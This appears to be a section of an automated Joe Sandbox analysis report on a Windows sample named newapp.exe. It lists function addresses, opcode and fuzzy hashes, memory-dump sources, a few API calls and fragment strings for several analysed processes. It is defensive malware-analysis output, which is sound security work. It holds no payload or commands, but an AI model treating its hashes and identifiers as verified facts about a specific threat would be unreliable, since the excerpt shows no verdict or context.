Instruction ID: 6da2659908b1f61255a55b7d2364323afc166aeb1715bfa15dc6ebf43dfe1214
Opcode Fuzzy Hash: 41bfab73515588343b0aa96fc4f9fe3f73045a1256fd578f1cd92682ea5d087e
Instruction Fuzzy Hash: 8301B532B051256BDF54A669DC14AEF77EEDBC4724F01403AD509D7284DE259C0787E2

Function 066740D0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eac3efd9ebb81737359344341270669cb332da090cc7992fdd9b5fcafb82538
Instruction ID: 67ecee8e4fa7228957c3c0dfaba0a75d95ab054d86d25a862e939ae803ae8e81
Opcode Fuzzy Hash: 4eac3efd9ebb81737359344341270669cb332da090cc7992fdd9b5fcafb82538
Instruction Fuzzy Hash: 7F118E32B001299FDB44AA68D8146AF73EAEBC8214F018039C50AE7384EE259C028BD1

Function 0667F28F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376bf5c83a30985441fad7e25fd0162036125696841cd4f9eaa91aa11e1e727d
Instruction ID: 27c9369ba2be1bce7b9fcf682dcf689544f1595603626afe136aecbeaa67dfe3
Opcode Fuzzy Hash: 376bf5c83a30985441fad7e25fd0162036125696841cd4f9eaa91aa11e1e727d
Instruction Fuzzy Hash: 5E01B135B105512FCB61957CA451B6B7BDADBCA720F14442AE50ACB341DA24DD4243A6

Function 0667A3EA Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17be4ea65b262f36b89b3834615fb991f9b38a97a52ea7c79134676a9dff885
Instruction ID: 5a8809ac0caf101e8baacb4cf96f7f66bcb6c1bac10ca9a49d12c030f38b30ba
Opcode Fuzzy Hash: e17be4ea65b262f36b89b3834615fb991f9b38a97a52ea7c79134676a9dff885
Instruction Fuzzy Hash: 2101B531B101205FC751EA7CE86462FB7D9DBCA714F14846EE20ACB389DE26DD0287A6

Function 06673D88 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3caeb1015eaf505676eb1cf97fc0ff1dc2587ce1e7d227abf9fa347616d645fa
Instruction ID: a6d8afeebc5d335a86bb200962a518d45b92140e70d1aedde0f6cfd141590042
Opcode Fuzzy Hash: 3caeb1015eaf505676eb1cf97fc0ff1dc2587ce1e7d227abf9fa347616d645fa
Instruction Fuzzy Hash: C921E0B5D01259AFCB10DF9AD885ADEFFB4FB48310F10812AE918A7200C774A954CBA5

Function 0667315C Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8500f7a263e4e85cac35ffbbd986e845c20c1c882fc06d2b0711e04aef002077
Instruction ID: 20a183d6e9945fdfeea0633f6031f6c3e7db3d27d5594d6c78055f8f2f4abc39
Opcode Fuzzy Hash: 8500f7a263e4e85cac35ffbbd986e845c20c1c882fc06d2b0711e04aef002077
Instruction Fuzzy Hash: E721BDB5D01259AFCB00DF9AD884A9EFBB4FB48320F10812AE918B7300C374A954CBE5

Function 06674318 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98d85febd3c6c48338199c9f5e6ad093ebada7cca92c8d6471f413d94616ebb
Instruction ID: 3335ff2637f579c9fd2040946f8fef4da4546b7566488e8fe8511329279312af
Opcode Fuzzy Hash: e98d85febd3c6c48338199c9f5e6ad093ebada7cca92c8d6471f413d94616ebb
Instruction Fuzzy Hash: DB016D31B401111BDB64956ED41972EA3DADBC9B24F248839E60EC7348ED66DC0243A6

Function 0667F2A0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c3f467f8bf72252650e1f96accc758b2f9f7b8adac50826cf71506fc7574a3
Instruction ID: 08f04f582b2ff688365e2b98bf5d7d19119c81feb0a95ac7d3056f5ae70fb1fe
Opcode Fuzzy Hash: 56c3f467f8bf72252650e1f96accc758b2f9f7b8adac50826cf71506fc7574a3
Instruction Fuzzy Hash: DF018C35B104111BDB6496BDE450B2FB6DADBC9B24F148839E50EC7340EE25DC0247A6

Function 0667FEF3 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be59cb726da68e4276f0d394b30985ec9610152f198de5b7d4fc4b479c8224aa
Instruction ID: 2a402ed63142a58fea9636eae35c9a5adceeaae3fbbfff323c1f9506c950f3d0
Opcode Fuzzy Hash: be59cb726da68e4276f0d394b30985ec9610152f198de5b7d4fc4b479c8224aa
Instruction Fuzzy Hash: 2801D62094D7801FC36293799C10A9ABFA59F83210F0542EBE454CF2A7EF29DD48C3E6

Function 0667A3F8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce71427b93fcfab2c958b2ff361dc65357e7aa262d0cd6166341ed94f8503d12
Instruction ID: 88066f07b416fcd78214a3180add92056633872324f6447e9818a94af566b022
Opcode Fuzzy Hash: ce71427b93fcfab2c958b2ff361dc65357e7aa262d0cd6166341ed94f8503d12
Instruction Fuzzy Hash: 98011D31B104105FDB50EA78E96472EB3DADB89718F108429E60AC7799EE26ED0287A5

Function 0667FF10 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f27e947045c6261974fa211ee3803f7625e6073942203e7b44b6ef00fd73b0
Instruction ID: 69a5c1e68a54a27839d08d666b9eedd0c644073f2ff8c7279f6e7c9399203296
Opcode Fuzzy Hash: f9f27e947045c6261974fa211ee3803f7625e6073942203e7b44b6ef00fd73b0
Instruction Fuzzy Hash: 01E0E531E403151BC750A27ED900A9EEF99DFC0660F008638E4189B358EF35ED4987D4

Function 06676560 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b899eb4ac4e143d85a538a8e86a0796f330f08ed973ebda03b779806aae9e4aa
Instruction ID: 9d3a998f2564be9c146c92acc4f321fe8bee2ca8f573d4fda93c2d59ece801e6
Opcode Fuzzy Hash: b899eb4ac4e143d85a538a8e86a0796f330f08ed973ebda03b779806aae9e4aa
Instruction Fuzzy Hash: 91F0E570905B04AFDB50CE64D98565ABBA8EB02214F208495D408CB212E632ED1097A1

Non-executed Functions

Function 06677788 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06677D13
$^q, xrefs: 06677D09
$^q, xrefs: 066778A1
$^q, xrefs: 06677CFD
$^q, xrefs: 06677C6A
$^q, xrefs: 06677C5E
$^q, xrefs: 066778D2
$^q, xrefs: 066778DE
$^q, xrefs: 06677D1F
$^q, xrefs: 066778AD

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 8b55a704612d64f9a93f67b2b8a73e2912cc5c18aec2c6e09aeec17bf6d4d595
Instruction ID: 863b7348597d25eb3d65a89a92e922a45b3639be77e96416f1a8f0c656a08da1
Opcode Fuzzy Hash: 8b55a704612d64f9a93f67b2b8a73e2912cc5c18aec2c6e09aeec17bf6d4d595
Instruction Fuzzy Hash: A9120B34E00219CFDB64DF69C954AADBBF2BF88704F2085A9D409AB355DB309D86CF91

Function 0667AA18 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 0667AB1A
$^q, xrefs: 0667AB75
$^q, xrefs: 0667AB0E
$^q, xrefs: 0667ABA0
$^q, xrefs: 0667AB94
$^q, xrefs: 0667ABD6
$^q, xrefs: 0667AB69
$^q, xrefs: 0667ABCA

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: f1acb487867371dfb8f072b2749b9c1d04995c3fdf75f6b4ddd7721504599d1c
Instruction ID: 77570a51e08ef52e6622884b11990f5c5c6fe67ecd9f2aa2b3a10edaff80e339
Opcode Fuzzy Hash: f1acb487867371dfb8f072b2749b9c1d04995c3fdf75f6b4ddd7721504599d1c
Instruction Fuzzy Hash: 73918F30E00209DFDB68EFA9DA54B6EB7F2EF84705F208429D4059B394DB74AD45CB91

Function 06677188 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06677690
$^q, xrefs: 066774D0
$^q, xrefs: 06677624
$^q, xrefs: 0667746A
.5vq, xrefs: 066771E3
$^q, xrefs: 0667769C
$^q, xrefs: 066774C4

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 8ea3126cb31e462ac7e048647a27b8761ddf1028ea737727af88bc3b958f1bda
Instruction ID: 17c61de87f1ddc5f8aeb804da535b64d5f70ceace0fb04a92a73012487732772
Opcode Fuzzy Hash: 8ea3126cb31e462ac7e048647a27b8761ddf1028ea737727af88bc3b958f1bda
Instruction Fuzzy Hash: 1DF15F34B00208CFDB59EB69D594A6EBBB3FF84348F248528D4059B399DB35EC46CB51

Function 066784C0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06678726
$^q, xrefs: 0667877F
$^q, xrefs: 0667871A
$^q, xrefs: 0667878B

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 254311c05cd5f1da449bfa5648856a6c94f572d93fd9ce3e72a8a306d8309d0d
Instruction ID: 427daf6e040673ae444f32ce7cec30d22c91236a83c6c278d185e035b25556d2
Opcode Fuzzy Hash: 254311c05cd5f1da449bfa5648856a6c94f572d93fd9ce3e72a8a306d8309d0d
Instruction Fuzzy Hash: 30B13934A00208DFDB54EB69D59466EBBB2EF84304F24883DD40ADB399DB75DC82CB91

Function 066788D8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 06678957
$^q, xrefs: 06678963
LR^q, xrefs: 066789CB
LR^q, xrefs: 06678A1A

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 12f32664e3014d52fa236d1000b5b1ffb72e35a44c099f236598655fadd3db5f
Instruction ID: 53dc2106e84d119d7567f364db0e040e9a9fbe66f9bf01c10aed903ef8b66740
Opcode Fuzzy Hash: 12f32664e3014d52fa236d1000b5b1ffb72e35a44c099f236598655fadd3db5f
Instruction Fuzzy Hash: F851B130B002019FDB58EB38D958A6AB7E6FF84708F14896DE4069B399DB31ED45CB91

Function 0667ADA2 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

$^q, xrefs: 0667AF24
$^q, xrefs: 0667AED1
$^q, xrefs: 0667AF53
$^q, xrefs: 0667AF7C

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 8ca8442763e15a1bef615e28a8a6fd83ff8a477a070f2e47833bccec1551f316
Instruction ID: e8ad8441eb0ff29284e636096c334bc7c30ac8030bee749bd4da979966bdc1be
Opcode Fuzzy Hash: 8ca8442763e15a1bef615e28a8a6fd83ff8a477a070f2e47833bccec1551f316
Instruction Fuzzy Hash: 70519034B102489FDF65EBA8D5806AEB7B2EB84304F208529E406DB355DB35EC42CF91

Analysis Process: newapp.exePID: 2032, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	2

Executed Functions

Function 00CB8FCC Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00CB9089

Memory Dump Source

Source File: 0000000C.00000002.1920267999.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cb0000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dfd6d2b6a2f404fda93f9d7d148fb3753359c146c6bdffa1520704124a40fadd
Instruction ID: 757d5b6d272bcd95c97462c3314f79b8d6e9f81e01febd254c53204cd7d35d1d
Opcode Fuzzy Hash: dfd6d2b6a2f404fda93f9d7d148fb3753359c146c6bdffa1520704124a40fadd
Instruction Fuzzy Hash: 6741EFB0C00619CFDB24DFA9C844BCEBBB5FF49304F2480AAD408AB255DB766945CF90

Function 00CB7B5C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00CB9089

Memory Dump Source

Source File: 0000000C.00000002.1920267999.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cb0000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5be85217fbc5610150091b828964e845ca284bc518d3b34cf67d2a3f20c832d1
Instruction ID: 46b26730f1e2516bf82973bef69956e882724c00404edf191ed22eccd940a230
Opcode Fuzzy Hash: 5be85217fbc5610150091b828964e845ca284bc518d3b34cf67d2a3f20c832d1
Instruction Fuzzy Hash: 6E41CFB0C00619CFDB24DFA9C944BDEBBB5FF49304F2480AAD508AB255DBB56945CF90

Function 00CBE778 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CBE7DE

Memory Dump Source

Source File: 0000000C.00000002.1920267999.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cb0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 63141b5b38d1d696b8e1fcf33be6469ae2fb33699458443ff2e478d7bc541c06
Instruction ID: 530bc2e7373047f24b227992ec6fdb01b08b54c89a3da26063bb6c422088f56f
Opcode Fuzzy Hash: 63141b5b38d1d696b8e1fcf33be6469ae2fb33699458443ff2e478d7bc541c06
Instruction Fuzzy Hash: FF11E0B5C002498FCB10DF9AC444ADEFBF9EB88724F10842AD469B7610D775A645CFA5

Function 0080D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_80d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12a25bd7d73895c22ee0f21697b6d1f121a70dfc2cfb4066846aa8709bda138
Instruction ID: 975510929c1b03a973a3dc81480b9f34755f8fb15b10171ac4998c7f720bfda4
Opcode Fuzzy Hash: b12a25bd7d73895c22ee0f21697b6d1f121a70dfc2cfb4066846aa8709bda138
Instruction Fuzzy Hash: AD21F172504304DFDB45DF94D9C4B2ABF65FB88314F20C569ED098B296C336E816CBA1

Function 0080D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_80d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab20939d6ebcfc64eeb6f2674660c5ef0696b69e3871eb7f8f896469c08dcbf
Instruction ID: facd39657c4bf5ffe42c8276ddc65e17b708cd6f8987063a1c67ad643ff4cfbd
Opcode Fuzzy Hash: 4ab20939d6ebcfc64eeb6f2674660c5ef0696b69e3871eb7f8f896469c08dcbf
Instruction Fuzzy Hash: 09212571500704DFDB45DF54DDC0B2ABF65FB98324F20C169E9098B296C33AE856CAA6

Function 0081D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1919211862.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_81d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b33638c7784cd6fa90c17c74f93bae0a73f054ea6bcb8dc7961a00b5eb24ae6
Instruction ID: 7fce17a39780fb6e4c547b14ce81c23ec143695ebdcf8b7ad1b53fc6c3b238bd
Opcode Fuzzy Hash: 1b33638c7784cd6fa90c17c74f93bae0a73f054ea6bcb8dc7961a00b5eb24ae6
Instruction Fuzzy Hash: 1921F275604704DFCB14DF14D984B66BBA9FF88318F20C56DD80A8B296C33AD887CA61

Function 0080D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_80d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction ID: d50f367ed5cf800c1c2369ab0034fd7f7ef953cfe2864769c1efc5dfee55a68f
Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction Fuzzy Hash: 4021CD76404340CFDB06CF40D9C4B16BF62FB84314F24C1A9DC084B296C33AE82ACBA1

Function 0080D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_80d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 6464992856edaf1fd88e15045f0b0cc746f64849fe98e0a36d716c34314f5640
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: F611E172504740CFDB02CF44D9C4B16BF71FB94324F24C2A9D8094B256C33AE85ACBA1

Function 0081D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1919211862.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_81d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 5ca955f26ff2b2f29947720c0d0acf2e92f9108e09f49933cc708b914cbd1f47
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A811BB75504780CFCB11CF14D5C4B56BBA2FB88314F24C6AAD8098B656C33AD88ACBA2

Analysis Process: newapp.exePID: 4192, Parent PID: 2032COMMON

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	159
Total number of Limit Nodes:	18

Executed Functions

Function 067F3570 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067F3CBC
$^q, xrefs: 067F3C6F
$^q, xrefs: 067F3C7B
$^q, xrefs: 067F3C98
$^q, xrefs: 067F3CA4
$^q, xrefs: 067F3CC8

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: c8aed5be8e0ad614e02069d974afb2d4f9e0c42176a005e7f7569ca710fdf950
Instruction ID: 049bc4ba0a0fab11ce817f1590fc3225068e09c33cbfc2437e9f55fd79c074fd
Opcode Fuzzy Hash: c8aed5be8e0ad614e02069d974afb2d4f9e0c42176a005e7f7569ca710fdf950
Instruction Fuzzy Hash: 77324030E1071ACFCB54EF75D8549ADB7B2BFC9310F50C669D509AB264EB309985CB81

Function 067F7E68 Relevance: 3.0, Strings: 2, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067F81D7
$^q, xrefs: 067F81CB

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 47be0fa7156a4fcecf961037287d30765e155e5bc8eb3827dfe167c528945565
Instruction ID: c0a18ef821d98e3040ebb1562cd073fab38ad1d84618ac5622ddd5b6ebf6af96
Opcode Fuzzy Hash: 47be0fa7156a4fcecf961037287d30765e155e5bc8eb3827dfe167c528945565
Instruction Fuzzy Hash: ED028B30B102068FDB54DF68D990AAEB7F6FF84314F248529D5169B395DB31EC86CB82

Function 067E5370 Relevance: 1.8, APIs: 1, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3d5ba69c94ea50cedb996338fa624e45e300f633c4dc85e0ffb368e8e9cd73a1
Instruction ID: 4b04c889e8c5e1c4f1c8c3944f2d4b82e76709f96fa97a7afe2991fa1aa47547
Opcode Fuzzy Hash: 3d5ba69c94ea50cedb996338fa624e45e300f633c4dc85e0ffb368e8e9cd73a1
Instruction Fuzzy Hash: F0C1CE70A007098FDB44EF79C89056EBBF2FF89314B108969C44ADB355EB75E84ACB91

Function 067F66E0 Relevance: .8, Instructions: 825COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9233e19a47dd5e756f3fe9ea74ba0b2a805dbc48ead8d548aba7d23a9da047d9
Instruction ID: ce938f9f481809105abb79cba065b49c81aceeaa90bf3392ed40c831196d092b
Opcode Fuzzy Hash: 9233e19a47dd5e756f3fe9ea74ba0b2a805dbc48ead8d548aba7d23a9da047d9
Instruction Fuzzy Hash: C462BD34B202048FDB54DB68D594AADBBF2FF84314F248569E60AEB354DB31EC46CB91

Function 067FC268 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74991edc51183181e6bc5ee5790dd598a0c8777d75d1bff042c78f3002b1399
Instruction ID: 96b53b5603be879bfcc95660ae0b9b632b836a879faf4e9dcefbcefa5ee62072
Opcode Fuzzy Hash: c74991edc51183181e6bc5ee5790dd598a0c8777d75d1bff042c78f3002b1399
Instruction Fuzzy Hash: 21328130B102099FDF55EB68D580BBEB7B2EB88314F148529E605DB355DB31EC868B91

Function 067F56B0 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a9d1d4f6c6f59443ef9ac067f0977cba667284359453cc44c1ca5826f7ca65
Instruction ID: f224ad5fac402c749ce14c3e296f6ae13e918ec1d4d13805c2b67fca309d1cf1
Opcode Fuzzy Hash: 57a9d1d4f6c6f59443ef9ac067f0977cba667284359453cc44c1ca5826f7ca65
Instruction Fuzzy Hash: E8220571F202058FEF64DB64D884ABEBBB2FB95320F248425EA59DB345DA30DC41CB91

Function 067FB307 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e7b179a70bf281c76404f1d326fa27bed189603eb7ab743d8ac0d29b74f33d
Instruction ID: fb44942b7475d8b827890b3925c454f57ad0cbad5909294b087db3abca603643
Opcode Fuzzy Hash: f5e7b179a70bf281c76404f1d326fa27bed189603eb7ab743d8ac0d29b74f33d
Instruction Fuzzy Hash: EC229270E202098FDF64DB68C580BBDB7B6FB89710F648826E509DB395DA35DC81CB91

Function 067FADB0 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067FAEDD
